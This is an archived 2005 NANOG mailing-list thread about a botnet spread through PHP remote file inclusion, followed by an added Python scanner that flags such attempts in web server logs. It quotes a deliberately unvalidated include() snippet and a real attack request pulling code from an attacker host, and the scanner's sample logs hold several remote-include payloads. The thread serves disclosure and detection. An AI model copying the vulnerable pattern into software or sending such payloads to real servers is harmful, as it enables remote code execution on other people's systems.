[87536] in North American Network Operators' Group
RE: Re:Destructive botnet originating from Japan
daemon@ATHENA.MIT.EDU (Hannigan, Martin)
Fri Dec 23 19:54:01 2005
Date: Fri, 23 Dec 2005 19:53:32 -0500
From: "Hannigan, Martin" <hannigan@verisign.com>
To: <nanog@merit.edu>
Errors-To: owner-nanog@merit.edu
You'd think nsp-sec people would try and get nsp-jp involved. Oh, there is no nsp-jp, or skooter 15. :)
-----Original Message-----
From: Barrett G. Lyon [mailto:blyon@prolexic.com]
Sent: Fri Dec 23 19:21:47 2005
To: nanog@merit.edu
Subject: Re:Destructive botnet originating from Japan
Well, it appears that bad code always seems to be the root of problems. According to our research today, the problem appears to be caused by incorrectly written PHP applications that perform includes using a string without running any validation against the string:
index.php?test=test
$test=$_GET[test];
include("$test.php");
When the include executes, the test string passed from the GET includes execution instructions:
"GET /index.php?test=http%3A//210.170.60.2/....? HTTP/1.0" 200 8010 "-" "Wget/1.6"
It appears that the attacker at 210.170.60.2 (also the botnet hosting IRC server) is spreading his code as the include is called, pulling and executing PHP code from a remote server that injects the software.
I'm not sure if this needs to be alerted to anyone outside of this list, but it's pretty nasty.
-Barrett
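The request Barrett quotes is the classic remote file inclusion pattern: a query parameter that reaches include() unvalidated carries a URL instead of a local file name. The scanner below is an added example written for this archive page, not code from the original message or from Prolexic. It assumes Apache "combined"-format access log lines (the line in the message is a trimmed version of one), and the sample lines it runs on are constructed, using RFC 5737 documentation addresses rather than the real hosts named above. It flags any query parameter whose decoded value begins with a scheme that PHP's include() would resolve through a stream wrapper instead of the local filesystem.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qsl

# Constructed sample lines in Apache "combined" format (not real traffic).
# The third line mirrors the shape of the request quoted in the message;
# all addresses are RFC 5737 documentation addresses.
SAMPLE_LOG = """\
198.51.100.7 - - [23/Dec/2005:19:10:02 -0500] "GET /index.php?test=test HTTP/1.0" 200 8010 "-" "Mozilla/4.0"
198.51.100.7 - - [23/Dec/2005:19:10:05 -0500] "GET /index.php?test=about HTTP/1.0" 200 7110 "-" "Mozilla/4.0"
203.0.113.9 - - [23/Dec/2005:19:21:47 -0500] "GET /index.php?test=http%3A//192.0.2.10/....? HTTP/1.0" 200 8010 "-" "Wget/1.6"
203.0.113.9 - - [23/Dec/2005:19:21:49 -0500] "GET /page.php?file=ftp%3A%2F%2F192.0.2.10%2Fcmd.txt%3F HTTP/1.0" 404 210 "-" "Wget/1.6"
203.0.113.9 - - [23/Dec/2005:19:21:52 -0500] "GET /index.php?test=php%3A%2F%2Finput HTTP/1.0" 500 0 "-" "Wget/1.6"
"""

# Apache combined log format: client, ident, user, [time], "request", status, bytes, "referer", "user-agent"
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Schemes that turn include() of attacker-controlled input into remote or
# attacker-supplied code: plain URLs plus PHP's own stream wrappers.
REMOTE_SCHEMES = ("http", "https", "ftp", "php", "data")
SCHEME_RE = re.compile(r'^\s*([a-z][a-z0-9+.-]*):', re.IGNORECASE)


def inclusion_candidates(target):
    """Return (param, decoded_value, scheme) for every query parameter of the
    request target whose value starts with one of REMOTE_SCHEMES."""
    query = urlsplit(target).query
    hits = []
    for name, raw in parse_qsl(query, keep_blank_values=True):
        # parse_qsl already percent-decodes once; a second pass also catches
        # values that were double-encoded to slip past naive filters.
        value = unquote(raw)
        m = SCHEME_RE.match(value)
        if m and m.group(1).lower() in REMOTE_SCHEMES:
            hits.append((name, value, m.group(1).lower()))
    return hits


def scan_log(text):
    """Parse combined-format lines and return one finding dict per request
    that tried to feed a URL or stream wrapper into an include parameter.
    A 200 status on such a request is the case worth escalating: the include
    most likely succeeded."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        for param, value, scheme in inclusion_candidates(m.group("target")):
            findings.append({
                "client": m.group("client"),
                "time": m.group("time"),
                "param": param,
                "scheme": scheme,
                "included": value,
                "status": int(m.group("status")),
                "ua": m.group("ua"),
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['client']} param={f['param']} scheme={f['scheme']} "
              f"status={f['status']} ua={f['ua']!r} -> {f['included']}")
```

Running it over the constructed sample prints the three requests that carried a scheme (http, ftp, php://input) and leaves the two ordinary page loads alone. Log scanning only finds the attempts after the fact; the fix belongs in the application, which should map the parameter onto an allow-list of known page names instead of interpolating it into include(), and in php.ini, where turning off allow_url_fopen (and, on later PHP releases, allow_url_include) stops include() from fetching URLs at all.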